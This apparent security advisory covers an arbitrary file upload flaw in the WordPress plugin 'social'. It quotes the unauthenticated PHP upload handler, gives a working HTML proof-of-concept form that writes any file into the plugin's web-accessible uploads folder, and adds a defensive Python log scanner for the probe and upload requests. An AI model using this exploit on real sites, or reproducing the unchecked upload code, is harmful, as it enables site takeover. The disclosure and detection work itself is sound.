30 Jan

Vulnerability Details: Arbitrary File Upload Vulnerability in social

One of the things we do to make sure our customers have the best data on vulnerabilities in WordPress plugins is to monitor third party data on hacking attempts. Through that we recently came across a request for a file, /wp-content/plugins/social-networking-e-commerce-1/js/effects.js, from the plugin social. That plugin is no longer in the WordPress Plugin Directory, which could have been due to it being removed for a security issue.

Since the type of vulnerability that is probably the most likely to be exploited is an arbitrary file upload vulnerability, and since other plugins that were targeted in the same set of requests as this one have that type of vulnerability, we started looking over the plugin for that type of vulnerability and immediately found one.

In numerous files there is code that looks like it will take a file sent with a request and save it to the filesystem. We tested that out with the file /classes/views/social-options/form_cat_add.php to confirm the issue. That happens in the line that begins move_uploaded_file below; before it there is nothing that limits who can upload or what can be uploaded, other than the need to provide a POST input “config_path” that indicates where WordPress’ configuration file is (which is usually stored in a standard location):

<?php // opening tag; line 1 of the file, omitted from the original excerpt
session_start();
// The location of wp-config.php is taken straight from the request, so anyone
// who can guess the standard relative path can load WordPress and reach the code below.
$config_path = $_POST['config_path'];
require_once( $config_path . 'wp-config.php');
$pathinfo=$_POST['pathinfo'];
$pathinfo1=$pathinfo."/wp-admin/admin.php?page=social-category";

// No nonce check, no capability check, and no check on the file's type or extension
// happens before the uploaded file is written to disk.
if((!empty($_FILES["image"])) && ($_FILES['image']['error'] == 0))
{
$filename = basename($_FILES['image']['name']);
$path= dirname(__FILE__);
$path1=explode("classes",$path);
// Destination is the plugin's own web-accessible images/uploads/ directory.
$path2=$path1[0].'images/uploads/';
$newname = $path2.$filename;
move_uploaded_file($_FILES["image"]["tmp_name"],$newname);
} // closing brace added here; the rest of the file is not shown in the excerpt

Proof of Concept

The following proof of concept will upload the selected file to the directory /wp-content/plugins/social-networking-e-commerce-1/images/uploads/.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-content/plugins/social-networking-e-commerce-1/classes/views/social-options/form_cat_add.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="config_path" value="../../../../../../" />
<input type="file" name="image" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
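For defenders checking whether the hacking attempts described above have touched a site, the following is an added example (written for this post, not code from the plugin or its author) that scans web server access logs for the two request patterns the post identifies: the reconnaissance request for the plugin's js/effects.js file and a POST to the vulnerable form_cat_add.php handler. The log lines are constructed samples in the Apache "combined" format, which is an assumption about how the site logs requests; the plugin paths come from the post.

```python
import re
from dataclasses import dataclass

# Paths taken from the advisory: the reconnaissance probe and the vulnerable upload handler.
PLUGIN_DIR = "/wp-content/plugins/social-networking-e-commerce-1/"
PROBE_PATH = PLUGIN_DIR + "js/effects.js"
UPLOAD_HANDLER = PLUGIN_DIR + "classes/views/social-options/form_cat_add.php"

# Apache/nginx "combined" log format (assumption: the site logs in this format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


@dataclass
class Finding:
    ip: str
    time: str
    kind: str      # "probe" (request for effects.js) or "upload_attempt" (POST to the handler)
    status: int    # HTTP status: 404 on the probe means the plugin is not installed


def classify(line):
    """Return a Finding for a log line that matches one of the two patterns, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group("path").split("?", 1)[0]   # ignore any query string
    method = m.group("method")
    status = int(m.group("status"))
    if path == PROBE_PATH:
        return Finding(m.group("ip"), m.group("time"), "probe", status)
    if path == UPLOAD_HANDLER and method == "POST":
        return Finding(m.group("ip"), m.group("time"), "upload_attempt", status)
    return None


def scan(lines):
    return [f for f in map(classify, lines) if f is not None]


def summarize(findings):
    """Group findings by source IP; an IP that both probed and POSTed is the strongest signal."""
    by_ip = {}
    for f in findings:
        by_ip.setdefault(f.ip, set()).add(f.kind)
    return {ip: sorted(kinds) for ip, kinds in by_ip.items()}


def successful_upload_attempts(findings):
    """POSTs to the handler that the server answered with 200, i.e. worth checking images/uploads/ for."""
    return [f for f in findings if f.kind == "upload_attempt" and f.status == 200]


# Constructed sample log lines (RFC 5737 documentation addresses), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [30/Jan/2018:10:12:01 +0000] "GET /wp-content/plugins/social-networking-e-commerce-1/js/effects.js HTTP/1.1" 200 1842 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [30/Jan/2018:10:12:03 +0000] "POST /wp-content/plugins/social-networking-e-commerce-1/classes/views/social-options/form_cat_add.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [30/Jan/2018:11:40:22 +0000] "GET /wp-content/plugins/social-networking-e-commerce-1/js/effects.js HTTP/1.1" 404 212 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [30/Jan/2018:12:00:00 +0000] "GET /wp-login.php HTTP/1.1" 200 3456 "-" "Mozilla/5.0"',
    'this line is not in combined log format',
]

if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for ip, kinds in summarize(found).items():
        print(ip, kinds)
    for f in successful_upload_attempts(found):
        print("check images/uploads/ for files written around", f.time, "from", f.ip)
```

Run it against a real log with `scan(open("access.log"))`; an IP that appears with both "probe" and "upload_attempt", and a 200 response to the POST, is the case where the plugin's images/uploads/ directory should be inspected for files that were not placed there by the site's administrators.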
